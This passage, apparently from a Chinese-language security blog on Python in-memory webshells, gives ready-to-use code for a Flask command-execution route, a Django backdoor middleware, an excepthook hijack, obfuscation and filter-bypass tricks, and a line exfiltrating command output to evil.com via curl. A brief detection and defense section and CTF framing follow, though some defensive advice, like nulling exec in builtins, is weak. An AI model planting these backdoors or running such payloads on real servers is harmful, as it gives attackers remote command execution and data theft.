# Flask示例
exec("""
from flask import request
@app.route('/_shell')
def shell():
    import os
    return os.popen(request.args.get('cmd')).read()
""")

# 访问方式：/_shell?cmd=whoami

2. 中间件型内存马

# Django示例
exec("""
from django.http import HttpResponse
class MalwareMiddleware:
    def __init__(self, get_response):
        self.get_response = get_response
    
    def __call__(self, request):
        if request.path == '/_backdoor':
            import os, subprocess
            cmd = request.GET.get('c', 'whoami')
            return HttpResponse(subprocess.getoutput(cmd))
        return self.get_response(request)
    
# 注入中间件
import django.conf
django.conf.settings.MIDDLEWARE.insert(0, 'path.to.MalwareMiddleware')
""")

3. 异常处理型内存马

exec("""
import sys
def exploit(type, value, tb):
    if hasattr(value, 'cmd'):
        import os
        return os.popen(value.cmd).read()
sys.excepthook = exploit

# 触发方式：raise type('', (), {'cmd': 'whoami'})
""")

三、高级隐蔽技术

1. 反射加载

1 2	`# 通过字符串反射调用 getattr(__import__('os'), 'system')('whoami')`

2. 编码混淆

1
2
3

# Base64编码执行
import base64
exec(base64.b64decode('cHJpbnQoIkhlbGxvIFdvcmxkISIp'))

3. 延迟加载

1
2
3

# 使用__import__延迟加载
def malicious():
    return __import__('os').system('sleep 10')

四、检测与防御方案

检测方法：

运行时检查：

import inspect
# 检查所有路由
print(app.url_map)
# 检查已加载模块
print(sys.modules)

内存扫描工具：
- Pyrasite
- Memhunter

防御措施：

禁用危险函数：

1 2	`__builtins__.exec = None __builtins__.eval = None`

沙箱环境：

1	`from restrictedpython import compile_restricted`

RASP防护：
- 监控异常路由注册
- 拦截危险模块加载

五、CTF实战技巧

绕过过滤：

# 字符串拼接
'ex'+'ec("import os; os.system(\'whoami\')")'

# Unicode编码
exec('\x69\x6d\x70\x6f\x72\x74\x20\x6f\x73')

无回显利用：

1 2	# DNS外带 exec("import os; os.system('curl http://evil.com/`whoami`')")

持久化：

1
2
3

# 修改.pyc文件
import py_compile
py_compile.compile('malicious.py')

Python内存马因其灵活性成为高级攻击手段，理解其原理对攻防双方都至关重要。在CTF比赛中，这类题目通常考察代码审计、绕过技巧和内存操作能力。

转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。